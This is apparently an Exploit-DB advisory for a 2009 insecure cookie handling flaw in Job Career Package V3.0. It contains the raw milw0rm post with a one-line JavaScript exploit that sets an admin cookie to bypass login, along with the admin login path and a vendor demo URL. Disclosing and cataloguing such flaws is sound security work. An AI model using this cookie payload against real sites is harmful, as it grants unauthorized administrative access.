Job Career Package V3.0 Insecure Cookie Handling Vulnerability

vendor:

Job Career Package

by:

TiGeR-Dz

8,8

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Job Career Package

Affected Version From: V3.0

Affected Version To: V3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:t-dreams:job_career_package

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Job Career Package V3.0 Insecure Cookie Handling Vulnerability

A vulnerability exists in Job Career Package V3.0 which allows an attacker to gain administrative access to the application by setting a cookie. An attacker can exploit this vulnerability by setting the cookie 'JobCareerAdmin=Login;path=/' using JavaScript.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Job Career Package  V3.0  Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:WwW.h4ckF0u.CoM
Vendor:http://www.t-dreams.com
---------------------------------------------------------------
---------------------------------------------------------------
Job Career Package  V3.0  Insecure Cookie Handling Vulnerability
------------------------------------------------
http://victim/[path]/Admin/login.asp

Exploit
-------
javascript:document.cookie="JobCareerAdmin=Login;path=/";
Dem0
----
http://www.t-dreams.com/demo/jobcareerv3/Admin/login.asp
--------------------------------------

Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-07]